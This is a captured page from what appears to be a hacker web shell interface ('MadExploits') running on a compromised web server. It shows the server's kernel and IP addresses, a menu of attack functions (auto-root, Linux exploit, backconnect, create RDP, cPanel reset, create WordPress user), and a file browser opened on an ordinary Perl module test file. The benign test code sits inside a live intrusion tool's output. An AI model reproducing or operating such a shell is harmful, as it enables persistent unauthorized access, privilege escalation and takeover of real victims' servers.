Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.222
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
perl-Sub-Identify /
t /
[ HOME SHELL ]
Name
Size
Permission
Action
01basic-pureperl.t
77
B
-rw-r--r--
01basic.t
1.91
KB
-rw-r--r--
02errors.t
559
B
-rw-r--r--
03proto.t
249
B
-rw-r--r--
04codelocation-pureperl.t
83
B
-rw-r--r--
04codelocation.t
496
B
-rw-r--r--
05constant-pureperl.t
80
B
-rw-r--r--
05constant.t
305
B
-rw-r--r--
06codelocxs-pureperl.t
81
B
-rw-r--r--
06codelocxs.t
419
B
-rw-r--r--
20attributes.t
561
B
-rw-r--r--
21attributes-pureperl.t
104
B
-rw-r--r--
30signatures.t
2.28
KB
-rw-r--r--
pod.t
149
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : 20attributes.t
#!/usr/bin/perl BEGIN { if ($] < 5.014001) { print "1..0 # SKIP: tests won't pass on less recent perls\n"; exit; } } use Test::More tests => 3; use strict; use warnings; use Sub::Identify (); sub MODIFY_CODE_ATTRIBUTES { my ($class, $subref, @attributed) = @_; is(Sub::Identify::sub_fullname($subref), 'main::foo', 'half compiled'); return (); } sub foo : MyAttribute {} BEGIN { is(Sub::Identify::sub_fullname(\&foo), 'main::foo', 'full compiled'); } is(Sub::Identify::sub_fullname(\&foo), 'main::foo', 'runtime');
Close